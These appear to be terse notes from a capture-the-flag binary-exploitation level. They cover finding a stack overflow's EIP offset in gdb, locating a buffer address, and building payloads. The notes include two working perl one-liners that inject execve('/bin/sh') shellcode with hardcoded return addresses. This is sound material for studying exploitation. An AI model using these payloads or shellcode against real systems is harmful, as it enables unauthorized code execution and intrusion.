dest: 0xbffff6c6

With 2 20 bytes long inputs, we have a 40 bytes long union of the inputs that overwrite a return address. We will prepare a payload like this :

    [part of shellcode]<──────────┐
 ┌─┤[jump]                        │
 │  [address of shellcode start]├─┘
 └─>[rest of shellcode]

EIP at offset 29:
    gdb> pattern_create 40
    'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAa'
    gdb> disas main
    ...
    0x080485ca <+38>:	leave
 -> 0x080485cb <+39>:	ret
    gdb> b *0x080485cb
    gdb> r
     -
    AAA%AAsAABAA$AAnAACA
     -
    A-AA(AADAA;AA)AAEAAa
    gdb> n
    gdb> pattern_search
    Registers contain pattern buffer:
    EIP+0 found at offset: 29           # At this point, our introduced address will be called.
    EBP+0 found at offset: 25
    ECX+52 found at offset: 69
    ...

Address of shellcode: (pattern_search does not work properly)

    gdb> r
     -
    AAAAAAAAAAAAAAAAAAAA
     -
    BBBBBBBBBBBBBBBBBBBB
    gdb> x/100bx $esp                                        ┌─────────────────┤ 0xbffff6c6
    0xbffff6b0:	0xc6	0xf6	0xff	0xbf	0xd8	0x98 │  0x04	0x08
    0xbffff6b8:	0x01	0x00	0x00	0x00	0x5d	0x83 │  0x04	0x08
    0xbffff6c0:	0xe4	0x13	0xfd	0xb7	0x0d	0x00 └─┤0x41	0x41
    0xbffff6c8:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41

[shellcode: 20bytes]
[9 bytes][address]

perl -e 'print "\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80" . "A"x4075 . "\n" . "A"x9 . "\xc6\xf6\xff\xbf" . "B"x50' > /tmp/payload_1



run < <(python -c 'print "f" * 4095 + "\n" + "a toi de faire"')











We can store the shellcode in the 4096 bytes long buffer !!

Write on $eip

    gdb> r
     -
    AAAAAAAAAAAAAAAAAAAAAAA
     -
    ABCDEFGHIJKLMNOPQRSTUVWXYZ
    ...
    Stopped reason: SIGSEGV
    0x4d4c4b4a in ?? () ('JKLM')    # $eip we can overwrite is at offset 9 of second buffer

Payload:

 -
[random crap x 4095][\n]
 -
[B x 9][address of shellcode][random crap][shellcode][\n]

second buffer starts at 0xbfffe640. We choose 0xbfffe690 to store the shellcode

[B x 9][0xbfffe690][C x 80][shellcode]

perl -e 'print "A"x4095 . "\n" . "B"x9 . "\x90\xe6\xff\xbf" . "C"x67 . "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh" . "\n"'
